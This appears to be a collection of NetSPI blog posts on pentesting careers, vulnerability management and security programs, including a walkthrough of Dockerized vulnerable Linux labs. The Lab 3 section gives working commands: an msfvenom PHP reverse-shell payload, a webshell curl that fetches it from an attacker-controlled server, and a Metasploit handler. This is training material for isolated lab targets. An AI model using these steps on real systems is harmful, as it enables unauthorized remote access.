
Lessons Learned Building a Penetration Testing Program: OWASP Portland, OR Podcast with NetSPI’s Nabil Hannan

NetSPI Managing Director Nabil Hannan was featured on the Open Web Application Security Project (OWASP) Portland, Oregon Chapter podcast. During the interview, Nabil and the hosts, David Quisenberry and John L. Whiteman, discuss mentorship, advice for entry-level pentesters, security hiring amid the cyber security skills shortage, advice for companies building a security program, cyber security policy, and more. Listen to the full episode or continue reading for highlights from the conversation.

John: A lot of people in our chapter want to be pentesters. What advice do you have for them, especially coming from your direction as a consultant?
Nabil: When I built a pentesting practice, I was tasked with hiring and training a team of pentesters. The saying I picked up from that experience is, “I can teach someone to be smart, but I can’t teach someone to be clever.” So, if you want to be a pentester, truly a pentester that’s finding interesting and unique things, it requires you to think creatively and think outside the box. The technical part of pentesting can be learned or acquired, or you can get help, but it ultimately is someone that is clever who succeeds at pentesting.

John: Are there certain security domains that we simply don’t have enough skilled people for?
Nabil: Today, there is demand for security professionals in general across every domain. It is evident that we have a shortage in security expertise across the board. Security is still in its infancy. If you want to get in, regardless of which area, whether you want to test autonomous cars, or mobile applications, or medical devices, there’s a need for security in all of those things. What I would recommend to people is, figure out what you are truly interested in and figure out if there is an area or a domain that really excites you. Find something that you understand and are passionate about and decide if the security aspect is a fit for you.

John: Has there ever been a time where you have been challenged with communicating results or recommendations to clients that may have differing levels of security understanding?
Nabil: It’s a common situation that we find ourselves in. You have to speak the right language for your audience. And if you are not doing that, it can be a challenge. It’s even more challenging when you have multiple levels of people in your audience that have varying degrees of technical or security understanding.

An example that comes to mind is a secure code review assessment I completed where we found cross-site request forgery (CSRF). Nobody seemed to pay attention to it because we rated it medium severity, given you had to be authenticated to really do any harm. The leadership team came to us and said, let us know if you find anything critical, and then we will decide if we need to push the production date. We replied, the vulnerability may not be critical, but it can still cause a lot of damage. To communicate the severity of the damage effectively, we decided to create a proof of concept to show the impact, and we were able to effectively show how easy it would be to exploit that vulnerability. As a result, they pushed their deployment date to focus on remediation and better secure the application, based on our recommendation.

John: It's exploits that speak louder than words. If you just give two-dimensional bug numbers or risk ratings, it doesn't mean anything until you bring it to life, as you did here.
Nabil: As a consultant, your job is to help people understand what the true impact is based on the business that is being supported. Make sure you’re speaking the right language, the right message, and the impact defined from the business perspective and the technical perspective.

David (aka: Quiz): We often get asked by the young people in our chapter, do you need to have some time as a developer before going into something like pentesting?
Nabil: There are two ways to think about it. I come from a software development background and when I look at vulnerabilities, I can dissect them by really understanding the inner workings of the software and where it failed. If you don’t have software development experience, you can still be a tester. You can still run scripts, you can probably still run tools, and you can learn basic scripting to build automation and identify vulnerabilities. If you want to be an application pentester, chances are if you have a better understanding of how software systems are built, it will give you an advantage in coming up with creative ways to make those systems break. Is it a requirement? I don’t think so. But some of the best pentesters I know do come from a software development background.

John: What advice do you have for companies building a security program?
Nabil: Being in the security space, people naturally think security is the most important thing. That being said, when trying to figure out what’s the right security strategy for your organization, you first have to learn how the business makes money. That’s the first thing you need to learn as a security professional.

Then, align your security practices and efforts to enable the business to be better versus thinking of security as something separate. Organizations that are more immature or just getting started with security often view it as a roadblock or cost center, something that is only going to slow them down. But more mature practices adopt security culture over time and incorporate it into their processes. They learn to do it in a way that enables the business. This allows you to have a program that is mature, with security integrated. Understand the organization's appetite and what threshold of risk you are willing to take when designing and defining the program. Try as hard as possible to make security a part of the process without it becoming a friction point for the business to function. For example, trigger out-of-band security reviews in an automated fashion that won't block your business flow, understand your risk appetite, and have the ability to stop a business process from going forward if it is too risky. Being able to build that level of culture, communication, buy-in, and metric alignment is key.

John: …Should this process start with policy?
Nabil: Policy comes from somewhere even more important. It comes from your customers. Ask what security expectations your customers have. Then, depending on the business, there’s also regulation and compliance. Based on these two components, you need the right structures of leadership and culture to get buy-in across the organization to make security a part of your regular workflow versus it being a separate function.

Quiz: A challenge I have had this past year, is ensuring our security conversations are communicated correctly to others… product, customers, engineering, leadership, etc.
Nabil: Human behavior is something that I am fascinated by – how people can react differently to the same message depending on how it is delivered.

At NetSPI, our Resolve™ threat and vulnerability management platform is used by many of our customers internally to track and communicate their program metrics and dashboarding. If you start showing metrics like the number of open vulnerabilities by business unit, it creates a very different effect than if you were to name the open vulnerabilities along with the leader of that business unit. It builds a sense of competition to be better. When we work with customers to build threat and vulnerability management programs, security champions, or training curriculum, we try to focus on the human element of it to get people excited to improve their security posture rather than see it as a hindrance.

Quiz: What were your favorite Agent of Influence podcast episodes to date?
Nabil: My favorite was the first podcast episode I did with Ming Chow, a professor at Tufts University. We talked about computer science and education around security, and we even touched on interesting topics such as how he feels about teaching someone who could potentially do bad things.

During the episode with the former CISO of the CIA Bob Bigman, he provided really great insights around the life of the CISO, what they do, and what they have to live through. He helped define and change the focus of the CISO career.

Jeff Williams, the CTO of Contrast Security, was a good one, too. He and I recently did a joint webinar, How to Streamline AppSec with Interactive Pentesting.

And Quiz, I’m not saying this because you’re on this interview, but your interview was great too. Especially the book recommendations near the end. I had friends reach out the day it posted telling me how much they enjoyed the interview.


Dockerizing the NetSPI Linux Labs

Learning penetration testing takes time and specialized resources. Any experienced tester knows that once they have the academic knowledge of how a vulnerability could work, they’re itching to try it out in the real world – but they often lack the specialized (read: safe, legal) environment to apply their newfound knowledge. To help make that process easier, NetSPI is releasing several vulnerable Docker images and associated NetSPI lab walkthroughs that can be used to learn and practice offensive techniques against technologies commonly seen in real-world environments.

If you’re not familiar with Docker, check out the links below to get started.

For those unfamiliar with Scott Sutherland‘s existing Linux Hacking Case Studies blog series, Scott put together a series of labs that focus on exploiting common Linux issues. To make the lab environments a little easier to spin up, we’ve converted these labs into Docker images.

If you already have a base skill-set in penetration testing but want to increase your abilities in exploiting Linux-based systems, then these labs are for you. If you’re reading these titles and scratching your head at some unfamiliar terms, read the accompanying blog links first, then run through the labs to get a better understanding of the vulnerabilities.

For some of the following labs, two Docker images are used. One image runs the container for the lab itself; the other, msf_base, runs the container for the attacker and contains the Metasploit Framework needed to work through the exploits.

These instructions were created with the intent that you are running Windows, with WSL2 for necessary Linux operations, as well as Docker for Windows.

Lab 1: Attacking insecure Rsync configurations

In Lab 1, the participant learns about Rsync – a commonly used file copy/sync utility present on many Linux distributions.

Installation/Run Instructions

  1. Pull and run the Lab 1 Docker container, which spins up a vulnerable Rsync server.
    $ docker run -dit --rm netspi/lab1 bash
    Unable to find image 'netspi/lab1:latest' locally
    latest: Pulling from netspi/lab1
    692c352adcf2: Already exists 
    [TRUNCATED]
    3af53b42f112: Pull complete 
    4530eae3603e: Pull complete 
    Digest: sha256:d04c06f733cd5cfc00d619178fd7b09ade053ce9563e1b77b0dcc99f222bc28d
    Status: Downloaded newer image for netspi/lab1:latest
    f6086037b4e4a7b3ee30fc6957881225415d8a78840049ca1b44b2d5638d7daa
  2. Grab the container ID of the netspi/lab1 container. It is the first 12 characters of the long ID printed in step one, or you can find it by listing your running containers.
    $ docker ps
    CONTAINER ID   IMAGE         IMAGE COMMAND   [TRUNCATED]
    f6086037b4e4   netspi/lab1   "bash"          [TRUNCATED]
  3. From another terminal, record the IP of your Lab 1 docker container. You’ll use this IP as a target for Nmap scans later in the lab.
    $ docker inspect [container ID] | grep -F -m 1 \"IPAddress\":
                "IPAddress": "172.17.0.2",
  4. Now pull and run your msf_base container, launching into an interactive bash shell.
    $ docker run -it --rm netspi/msf_base bash 
    Unable to find image 'netspi/msf_base:latest' locally
    latest: Pulling from netspi/msf_base
    692c352adcf2: Pull complete 
    [TRUNCATED]
    fb2fa6eca858: Pull complete 
    Digest: sha256:2ec64fb7fa8c05c8e5b6b746539f6bd0bb52f9d6feaf98ff9ab2868adefca5c0
    Status: Downloaded newer image for netspi/msf_base:latest
    root@32be66de5038:/#
  5. Continue by following the lab here, using the Lab 1 container as the target host and the msf_base container as the attacking host: https://blog.netspi.com/linux-hacking-case-studies-part-1-rsync/.
  6. After you have finished the lab, be sure to stop your container to avoid taking up resources. (Note that the container can be referenced using the first four characters of the ID returned after pulling and running the new container in step one.)
    $ docker stop f608
     f608
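The grep in step three works, but it is brittle if the inspect output format shifts. As an alternative, here is a small Python sketch of our own (not part of the lab images; it assumes the default-bridge JSON layout that `docker inspect` emits) that parses the JSON directly:

```python
import json
import subprocess

def parse_container_ip(inspect_json: str) -> str:
    """Pull the default-bridge IPAddress out of `docker inspect` JSON."""
    # docker inspect prints a JSON array with one object per container
    data = json.loads(inspect_json)
    return data[0]["NetworkSettings"]["IPAddress"]

def container_ip(container_id: str) -> str:
    """Shell out to docker and return the container's bridge IP."""
    raw = subprocess.check_output(["docker", "inspect", container_id])
    return parse_container_ip(raw.decode())
```

With the Lab 1 container running, `container_ip("f608")` should return the same 172.17.0.x address the grep finds.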

Lab 2: Attacking insecure NFS exports and setuid configurations

Lab 2 will walk would-be Linux masters through attacking some common vulnerabilities in two widely used technologies/protocols – NFS exports and setuid configurations. One unique aspect of this lab includes using a little imagination.

In a perfect world, the lab would involve two separate Docker containers – one representing the attacker computer (running Metasploit) and a second representing the target (hosting the NFS exports).

However, nfs-client utilities such as rpcinfo and showmount don’t have the ability to communicate across Docker containers, so NetSPI reworked the attack scenario to give lab users the closest possible real-world approximation in this format. Both the target and the attacker are located in the same Docker container, so the attacker should execute the attack path outlined in the blog post linked below against 127.0.0.1.

Installation/Run Instructions

  1. Pull and run the netspi/lab2 image in privileged mode.
    $ docker run --privileged --rm -d netspi/lab2
    Unable to find image 'netspi/lab2:latest' locally
    latest: Pulling from netspi/lab2
    692c352adcf2: Already exists 
    [TRUNCATED]
    89f04cf1b6f3: Pull complete 
    Digest: sha256:be6363a0aa1715aa0a97824b131aa620c7509e47668bc5d1475c1985fb6d98be
    Status: Downloaded newer image for netspi/lab2:latest
    dd68291be63abd1ec4ffe6f9c55154106a9d708824d0a6bdd40286515548b5a7
  2. Run an interactive shell in the container noted above.
    $ docker exec -it dd68291be63abd1ec4ffe6f9c55154106a9d708824d0a6bdd40286515548b5a7 bash
  3. Proceed to the instructions in this lab: https://blog.netspi.com/linux-hacking-case-studies-part-2-nfs/. Note that you should skip the steps in which you log in to the target host using SSH, as both our target host and attacking host are one and the same due to the limitations of Docker described above.
  4. After you’re finished with the lab, stop the container.
    $ docker stop dd68
    dd68

Lab 3: Attacking insecure phpMyAdmin configurations and world-writable files

The steps in Lab 3 will teach students how to attack phpMyAdmin instances found during routine port scans. The steps to complete the lab represent a significant departure from the attack path discussed in the blog linked below, though they exhibit the same concepts.

Installation/Run Instructions

  1. Pull the netspi/lab3 image with Docker
    $ docker pull netspi/lab3
  2. List the Docker images and note the ID for the lab3 image
    $ docker images
    
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
    netspi/lab3         latest              4d30e4fe9cb9        6 months ago        975MB
  3. Run the lab 3 Docker image using the previously noted image ID, making sure to expose port 80 so the MSF container can access the phpMyAdmin service on the vulnerable container (netspi/lab3). Be sure to use docker inspect to note the IP address of the container for later.
    $ docker run -dit -p 80:80 [image ID]
  4. In a separate terminal, start a session within the MSF container to use as your attacker machine.
    $ docker run -it --rm netspi/msf_base bash                  
    root@e6cfb4c91a9f:/#
  5. Note the IP of the msf_base image you just spun up, you will need this later.
    $ docker ps
    CONTAINER ID   IMAGE             COMMAND     CREATED          STATUS          PORTS                          NAMES
    3ab944f8c546   1df49e2310ff      "bash"      9 minutes ago    Up 9 minutes    0.0.0.0:4444->4444/tcp         great_swirles
    e4ef60c9518d   netspi/msf_base   "bash"      12 minutes ago   Up 12 minutes                                  objective_austin
    14469fadfd40   4d30e4fe9cb9      "/run.sh"   13 minutes ago   Up 13 minutes   0.0.0.0:80->80/tcp, 3306/tcp   romantic_williamson
    
    $ docker inspect e4ef60c9518d | grep -F -m 1 \"IPAddress\":
                "IPAddress": "172.17.0.3",
  6. Using a web browser on the computer you're running all your Docker containers on, navigate to http://127.0.0.1/phpmyadmin/index.php (the lab serves plain HTTP on the mapped port 80).
  7. Follow the attack vector detailed in Scott’s blog here to brute force the password to the phpMyAdmin instance, as well as write a webshell in SQL to upload to the same instance’s backend. After you have written the webshell, refer to the Attack Setup section below to continue the exploit.
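Before brute forcing, it can help to confirm that the phpMyAdmin page is actually reachable from the host. This tiny Python check is our own addition, not part of Scott's attack path (the `/phpmyadmin/index.php` path comes from the steps above; everything else is an assumption about your setup):

```python
import urllib.request

def phpmyadmin_up(host: str = "127.0.0.1", timeout: float = 5.0) -> bool:
    """Return True if the lab's phpMyAdmin login page answers over HTTP."""
    url = f"http://{host}/phpmyadmin/index.php"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status == 200
    except OSError:
        # Connection refused, timeout, unreachable network, etc.
        return False
```

If this returns False with the lab container running, re-check the `-p 80:80` port mapping from step 3 before troubleshooting anything else.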

Attack Setup

The way phpMyAdmin was ported to Docker containers precludes an attacker from generating a reverse shell via cron job as depicted in Scott’s blog. To mitigate this problem, an alternative exploit was developed. The cmd.php file you just uploaded contains the curl command that will reach out and pull a hosted reverse shell from a SimpleHTTPServer running on the MSF Docker container you spun up above – this effectively replicates the backdoor outlined in Scott’s blog, but within the constraints imposed by running phpMyAdmin on Docker. Using Docker to do all this means you don’t have to go through troubleshooting a phpMyAdmin install, etc. and can focus on learning the exploit itself.

  1. In a third terminal window, open an msfconsole bash container with port 4444 exposed
    $ docker run -it --rm -p 4444:4444 {msf_base image ID} bash
  2. Generate a reverse shell with the msfvenom module
    1. Use a separate terminal window to grab the LHOST value for the msf_base container running with port 4444 exposed.

      $ docker inspect {msf_base container ID} | grep -F -m 1 \"IPAddress\":
      "IPAddress": "172.17.0.3",


    2. Generate the reverse shell using the same msf_base container that you plan to use to serve the simpleHTTPServer in the next step.

      $ msfvenom -p php/meterpreter_reverse_tcp LHOST=172.17.0.3 LPORT=4444 -f raw > reverseshell.php
  3. In the MSF Docker container you started earlier, spin up a simple Python HTTP server to host the reverse shell file. This allows you to curl the reverse shell from the victim computer.
    $ python -m SimpleHTTPServer 8088   # Python 3 equivalent: python3 -m http.server 8088
  4. In the GUI located at http://127.0.0.1/phpmyadmin/cmd.php, use the webshell uploaded previously to curl for the reverseshell.php file that was just created in the MSF container. The IP address should be the IP of the msf_base container you noted in step 5 of the installation instructions.
    $ curl docker_container_IP:8088/reverseshell.php -o reverseshell.php

    If you performed the above steps correctly, you will see the resulting GET request from the curl command be processed by the SimpleHTTPServer.

  5. Open another terminal window and access the same MSF container using the following steps:
    1. List all your running Docker containers
      $ docker ps 
      CONTAINER ID   IMAGE             COMMAND     CREATED          STATUS          PORTS                          NAMES
      f3c1bdede660   4d30e4fe9cb9      "/run.sh"   4 minutes ago    Up 4 minutes    0.0.0.0:80->80/tcp, 3306/tcp   eloquent_bell
      5623af2f7ecf   netspi/msf_base   "bash"      33 minutes ago   Up 33 minutes   0.0.0.0:4444->4444/tcp         goofy_noyce
    2. Access the bash terminal of the running msf_base container that has port 4444 exposed.
      $ docker exec -it 5623af2f7ecf bash 
      root@5623af2f7ecf:/#
  6. Set up a listener on the MSF container using the new bash terminal you just opened (the window not currently running the SimpleHTTPServer on port 8088). The LHOST IP should match the IP of the msf_base Docker container that has port 4444 exposed.
    root@5623af2f7ecf:/# msfconsole
    msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set PAYLOAD php/meterpreter_reverse_tcp
    PAYLOAD => php/meterpreter_reverse_tcp
    msf6 exploit(multi/handler) > set LPORT 4444
    LPORT => 4444
    msf6 exploit(multi/handler) > set LHOST 172.17.0.3
    LHOST => 172.17.0.3
    msf6 exploit(multi/handler) > run
    
    [*] Started reverse TCP handler on 172.17.0.3:4444
  7. Navigate to http://127.0.0.1/phpmyadmin/reverseshell.php
    1. Go back to your MSF container and type shell to open a shell. Then run a bash command to confirm that you have bash control of the phpMyAdmin console.
      meterpreter > shell
      whoami
      www-data
  8. Congratulations, you now have a reverse shell running on the target host.

Lab 4: Different ways to approach SSH password guessing and attacking sudo applications

Lab 4 will teach you to attack SSH passwords and sudo applications, and is perhaps the most accessible to those who are new to penetration testing.

Installation/Run Instructions

  1. Pull and run the Lab 4 Docker container.
    $ docker run -dit --rm netspi/lab4 tail -f /dev/null 
    Unable to find image 'netspi/lab4:latest' locally
    latest: Pulling from netspi/lab4
    692c352adcf2: Already exists 
    [TRUNCATED]
    d759bf5b0446: Pull complete 
    Digest: sha256:eca1ff10dcbcaf2aec164cb97f447c94853259d989ee122b271ab0325ffcef66
    Status: Downloaded newer image for netspi/lab4:latest
    944da34600eb9cf03b6dfc4423494897b0625974894039ef6a5e330d9955ca67
  2. Pull and run the msf_base container.
    $ docker run -it --rm netspi/msf_base bash 
    root@2bed01938a23:/#
  3. Proceed to the instructions in this lab: https://blog.netspi.com/linux-hacking-case-studies-part-4-sudo-horror-stories/. All commands from here on out can be run from the msf_base container.
  4. Once you have finished the lab, be sure to stop the container(s).
    $ docker stop 944d
    944d

Lab 5: Summary

Created with docker-compose, this lab is simply a consolidated way of running labs 1-4 and creating an msf_base container all in one fell swoop. Following the instructions below, docker-compose will create and start labs 1-4 and present you with an msf_base container from which to test. From there, follow the blog posts for labs 1-4 any time you get stuck!

Installation/Run Instructions

  1. Clone the GitHub repository
    $ git clone git@github.com:NetSPI/NetSPI-Docker-Labs.git 
    Cloning into 'NetSPI-Docker-Labs'...
    remote: Enumerating objects: 33, done.
    remote: Counting objects: 100% (33/33), done.
    remote: Compressing objects: 100% (30/30), done.
    remote: Total 33 (delta 0), reused 33 (delta 0), pack-reused 0
    Receiving objects: 100% (33/33), 8.97 KiB | 4.48 MiB/s, done.
  2. cd to the Lab 5 directory in the repository you just cloned.
  3. Run the Docker compose command to build and run the necessary images
    $ docker-compose up -d
    Creating network "lab5" with driver "bridge"
    Pulling lab3 (netspi/lab3:)...
    latest: Pulling from netspi/lab3
    c64513b74145: Pull complete
    01b8b12bad90: Pull complete
    [TRUNCATED]
    b74cb7320347: Pull complete
    0b77cb4369b4: Pull complete
    9e2e5286c54e: Pull complete
    Digest: sha256:303d80067ad6ad5e07fd3d1e7d2b67e32fec652d374f44ea9458098ba085c6f0
    Status: Downloaded newer image for netspi/lab3:latest
    Creating lab5_lab3_1 ... done
    Creating lab5_lab1_1 ... done
    Creating lab5_lab2_1 ... done
    Creating lab5_lab4_1 ... done
  4. Obtain the IP addresses of the launched containers for further use in attack scenarios.
    $ docker network inspect lab5 | grep '"Name": \| "IPv4Address": "'
    "Name": "lab5",
    "Name": "lab5_lab1_1",
    "IPv4Address": "172.18.0.5/16",
    "Name": "lab5_lab3_1",
    "IPv4Address": "172.18.0.4/16",
    "Name": "lab5_lab4_1",
    "IPv4Address": "172.18.0.3/16",
    "Name": "lab5_lab2_1",
    "IPv4Address": "172.18.0.2/16",
  5. Start the MSF container in the same network as the other lab5 containers
    $ docker run -it --network=lab5 netspi/msf_base bash
    root@0bea0cb52b2a:/#
  6. After you’re done with the labs, take down the containers. Be sure to run this command from the same folder you launched the containers from originally.
    $ docker-compose down
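The grep in step 4 can also be done programmatically. Here is a short Python sketch of our own (an assumption about your workflow, not part of the labs; it relies on the `Containers` map with `Name` and `IPv4Address` fields that `docker network inspect` emits) that builds a name-to-IP map for the lab network:

```python
import json
import subprocess

def parse_network_ips(network_json: str) -> dict:
    """Map container name -> IPv4 address from `docker network inspect` JSON."""
    net = json.loads(network_json)[0]  # inspect prints a one-element array
    return {
        c["Name"]: c["IPv4Address"].split("/")[0]  # drop the /16 suffix
        for c in net.get("Containers", {}).values()
    }

def lab5_targets() -> dict:
    """Shell out to docker and return {container name: IP} for the lab5 network."""
    raw = subprocess.check_output(["docker", "network", "inspect", "lab5"])
    return parse_network_ips(raw.decode())
```

With the compose stack up, `lab5_targets()` should give you the same four 172.18.0.x addresses as the grep, ready to feed into Nmap or Metasploit.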

Conclusion

Congratulations on getting this far – you’re ready to start learning. Take your time, read the blogs carefully, and proceed with *some* caution. For more penetration testing news and resources, follow NetSPI on Twitter, and if you’re having any issues with the labs that you want to ask us about, give us a shout on the GitHub repository for the labs! Finally, a huge thanks to Scott Sutherland, Emerson Drapac, Rafael Seferyan, and Bjorn Buttermann for the mountain of work they did creating these labs and the blog posts they’re based on.


“So What?” – The Importance of Business Context in Vulnerability Management

In the first installment of my vulnerability management blog series, I discuss the pitfalls of not having a vulnerability testing and tracking strategy and the serious consequences of failing to recognize what is meaningful to the business. In part two of the series, I will expand on the idea of recognizing what is meaningful to the business and discuss the importance of business context in vulnerability management.

It sounds nebulous, and for good reason. From my observations over the years, I’ve heard claims that the best approach to cyber security is either 1) purchasing more technology to keep ahead of the latest vulnerabilities or 2) changing behaviors that pose the most risk, such as clicking on unknown links or using stronger passwords. While there is a place in a security program for these and other security measures, time and budget constraints create major barriers. Instead of asking, “which new technologies do we need to add to our security stack?” or “why isn’t my organization getting a perfect score on our phishing assessments?”, the most important question that needs to be asked is, “So what?”

“So what?” is arguably one of the most elemental and important criteria in any cybersecurity situation, from policy to technical security controls. The question forms the basis of nearly every security decision and requires alignment to core business objectives to be determined and applied before a direction is taken. Recognizing how each security decision impacts your business is vital. To understand the importance of “So what?” we must first understand its place in your cyber security strategy.

Strategy is another concept that can mean different things to different people, in part because there is no standard approach to cyber security program development. Each business has different security needs. As security leaders, we address the threats that pose imminent and perceived harm to the environment, and those that get noticed most get attention first. And understandably so, given the ever-advancing threats companies face. Often, however, what is considered harmful to the environment is not rooted in what is most important, or in what poses the most risk to the business. That is where a business-aligned vulnerability management program comes into play.

How to Achieve a Business-Aligned Vulnerability Management Program

A business-aligned vulnerability management program takes into consideration the vulnerabilities that would have the most significant, negative impact on the business, the most relevant threats that could exploit those vulnerabilities, how to remediate, as well as the controls needed to counter those threats. Such a strategy is built on a framework that enables, implements, and maintains the program and informs all security initiatives, controls, and processes.

Once a business-aligned vulnerability management program is in place, we can ask, “So what?” when considering a potential risk, a discovered vulnerability, a detected event, a proposed initiative, or virtually any other consideration affecting security posture. Let’s look at a few hypothetical vulnerability findings:

Vulnerability Finding: Poor Administrator Account Password
So What? Attacker can gain access to and steal data. Poses enterprise risks to information, business operations, regulatory compliance, and business reputation. Regulatory non-compliance leading to financial sanctions. Legal action by affected customers leading to financial reparations.
Remediation Recommendations: Change the admin password. Strengthen the admin password. Use multifactor authentication. Use a “zero trust” access model. Purchase technology to enhance identity and access controls. Conduct vulnerability testing more often.

Vulnerability Finding: Vulnerable Version – PHP
So What? Successful exploitation of available vulnerabilities may allow a remote unauthenticated attacker to execute arbitrary commands directly or indirectly on the affected systems. As a result, the confidentiality, integrity, and availability of the affected systems and associated data may be compromised.
Remediation Recommendations: Disable or uninstall PHP if it is not required for a defined business purpose. If PHP is required, upgrade to the latest stable version of the software or apply vendor supplied patches. If no fix is available, contact the vendor for solutions and consider isolating the affected service via host based and network firewalls.

Vulnerability Finding: SQL Injection
So What? SQL injection may allow an attacker to extract, modify, add, or delete information from database servers, causing the confidentiality and integrity of the information stored in the database to be compromised. Depending on the SQL implementation, the attacker may also be able to execute system commands on the affected host. In some circumstances, this provides the means to take control of the server hosting the database, leading to the complete compromise of the confidentiality, integrity, and availability of the affected host.
Remediation Recommendations: Employ a layered approach to security that includes using parameterized queries when accepting user input. Strictly define the data type that the application will accept. Also, disable detailed error messages that could give an attacker information about the database. Additionally, following the principle of least privilege when assigning permissions for the service account and database user helps limit the impact of a successful SQL injection attack.

Eliminate the “So what?” column and it becomes difficult to choose which vulnerability to prioritize. Taking these examples further, we can use the same strategy to determine the ramifications of conducting certain types of vulnerability scans, from the resources needed to conduct the test to the large number of vulnerability instances that will require analysis. For example, if you target scans to detect just the vulnerabilities that have a significant answer to “So what?”, in other words, a major impact on the business, you can focus your resources – people, time, money – on the meaningful measures to manage risk to the business.
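The parameterized-query recommendation in the SQL injection finding above is easy to demonstrate. The sketch below uses Python's sqlite3 purely as an illustration; the table, data, and payload are invented for the example:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

user_input = "nobody' OR '1'='1"  # a classic injection payload

# Vulnerable: concatenating input lets the payload rewrite the WHERE clause,
# so the query matches every row even though 'nobody' does not exist.
query = "SELECT role FROM users WHERE name = '%s'" % user_input
leaked = conn.execute(query).fetchall()  # returns the admin row anyway

# Remediated: a parameterized query treats the input strictly as data,
# so the payload matches nothing.
safe = conn.execute(
    "SELECT role FROM users WHERE name = ?", (user_input,)
).fetchall()
```

The least-privilege advice in the same finding is the complementary layer: even when injection succeeds, a low-privilege database account limits what the attacker can reach.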

This all ties back to risk-based security. By now, the security industry understands why risk-based security strategies are more effective than compliance-based strategies, but organizations are often challenged as to how to make the shift. To mature your security program and achieve a risk-based strategy, it is essential to align business logic with vulnerability management and prioritize the vulnerabilities that pose the highest risk specific to your business.


RSA Conference: Striking the Balance between Automation and the Human Touch in Penetration Testing

On March 19, 2021, NetSPI Chief Operating Officer (COO) Charles Horton was featured in RSA Conference:

Navigating how to reap the benefits of automation and when to use manual processes is an age-old cybersecurity challenge. How can organizations achieve efficiencies without the support of automated technologies? How can they ensure they’re getting the most thorough coverage without the human touch? In my opinion, it isn’t an either-or. Organizations need both automation and manual strategies to ensure their assets are protected from cyberattacks, and there is much to learn from the penetration testing community.

Pentesting is a great example of the importance of collaboration, not only between humans, but also between humans and machines. Penetration testing can be a balance of automation and manual efforts so that a cybersecurity program pays dividends.

Read the full RSAC article to better understand the benefits (and potential limitations) of using the different approaches alone and learn how to strike balance between automation and manual efforts.

Back

4 Ways to Avoid Getting Too Comfortable with Your Cyber Security Program

If you work in cyber security, you know that an organization can have an incredibly mature or sophisticated security program and still experience a breach. There is no silver bullet to prevent this type of event at your company, but over the years I have found ways to continue to push our program forward and never get comfortable with where we are.

I had the pleasure of sitting down with NetSPI’s Nabil Hannan to discuss some of those strategies as part of the Agent of Influence podcast. During our conversation, we discussed four strategies to stay focused on the highest priority actions and help keep a company safe.

1. Leverage and Listen to Your Red Team

You can learn a lot about your security program from red team engagements – namely, its areas of strength and weakness. Red teams can come up with some fantastic attacks against your company and open the door to new security considerations your blue team hadn’t thought of. You don’t necessarily need a large team to succeed at red teaming. At Code42, we have two people responsible for our red team engagements. And if you don’t have an internal red team, find a partner to collaborate with you on the engagement.

Many red teams today are leveraged for a standard monthly kill chain exercise. That’s a great practice, but try leveraging your red team for a larger, more complex engagement. An engagement that emulates the most likely attack against your organization will force them to think creatively about how to carry that attack out and how to prevent it from happening to your organization.

2. Perform Regular Threat Assessments

The second activity I encourage is to establish regular threat assessments. As security leaders, we can get stuck doing simple, straightforward compliance assessments. While compliance assessments can uncover a lot of risks, you start with a list of requirements rather than starting with what could go wrong at the company – and sometimes those don’t align.

In my current role as CIO and CISO at Code42, we do the traditional controls assessment, maturity assessment, and we use NIST, ISO, among other compliance frameworks. In addition, we take time every year to bring different leaders from various parts of the organization together, along with security experts from production and research and development (R&D), to complete a deep dive threat assessment. On this brainstorming day, we discuss all the terrible things that could happen to our company and assess what controls and processes we have in place – or do not have in place – for prevention and incident response. From there, we create a laundry list of actions to prioritize and ensure we improve our security posture.

3. Prioritize Existing Security Gaps, Then Do a Benchmarking Exercise

When building out a security program, chances are you have existing security gaps. My advice is to find and fix those first. For example, the volume and magnitude of risk from email phishing was prevalent when I first started as a CISO. So that’s where we started.

There are going to be security issues that are obvious. I think it’s important to tackle those right off the bat and earn some quick wins for your team. After that, pause and do a benchmarking assessment to figure out what activities to prioritize next. A benchmarking assessment is particularly important to do when things become less clear as to what to go after. Many leaders start with benchmarking – hear Nabil’s take on the timing of benchmarking during our podcast conversation – but I have the opposite advice. If you know what’s broken and you’re hearing about it, that’s where you should start.

4. Understand That The Importance of Application Security Has Never Been Greater

My team spends the majority of our time on application security. Why? Because that is where the majority of our risk lies today. There are a couple of shifts in application security that are worth paying attention to.

First is the rise of the serverless concept. Applications can now be built without connecting directly to the underlying OS and/or database, which expands the attack surface at the application layer. It is more important than ever to focus on protecting the application layer knowing that the attack surface is expanding there today.

Another incredibly important application security focus area is figuring out where to plug security resources and security scanning processes into your development lifecycle. At Code42, we built a standalone product application security function embedded within our R&D team. They’re part of the scrum teams, listening to the story mapping, embedding testing early on, and bringing up security concerns. I believe that the more security is seen as a partner and embeds itself early with development teams, the better. Security is still considered the outsider in many organizations, but we’re starting to be part of the larger development team at Code42. In a dream world, I would love for developers to be security developers – that’s utopia.

The speed at which applications are being built, updated, and deployed is always going to be a constant challenge for security. This ties back to the idea that comfort is the enemy. As security professionals, we need to continuously evolve and evaluate our security program to protect against adversaries. If you become too comfortable with your program, it’s likely that there’s something you’re missing.

Back

Key Takeaways from the Florida Water Facility Hack

Now that the dust has settled on the recent Oldsmar, Florida water treatment facility breach, let’s take a deeper look at some of the lessons we can learn from the incident.

For those unfamiliar with the breach, on February 5, hackers accessed a Florida water facility that treats water for around 15,000 people near the Tampa area. The hackers were able to increase the amount of sodium hydroxide, or lye, distributed into the water supply, which is dangerous to consume at high levels. Luckily, there was an attendant that noticed the suspicious behavior and reported it, mitigating the breach without consequence.

They gained access to the computer system through TeamViewer, a popular remote access software application commonly used for remote desktop control, screen sharing, online meetings, and file transfers. Third party IT support is a common use case for TeamViewer and, according to its website, it has been installed on over 2.5 billion devices today. There has not been confirmation on how the attacker got ahold of the remote access system credentials, but we can speculate that an employee of the water facility fell victim to a social engineering attack, such as phishing.

Given the breach itself was not sophisticated and its impact was minimal, many in the cyber security community are surprised that this is making national headlines. But it is the potential of what could have happened that is causing a panic – and rightfully so.

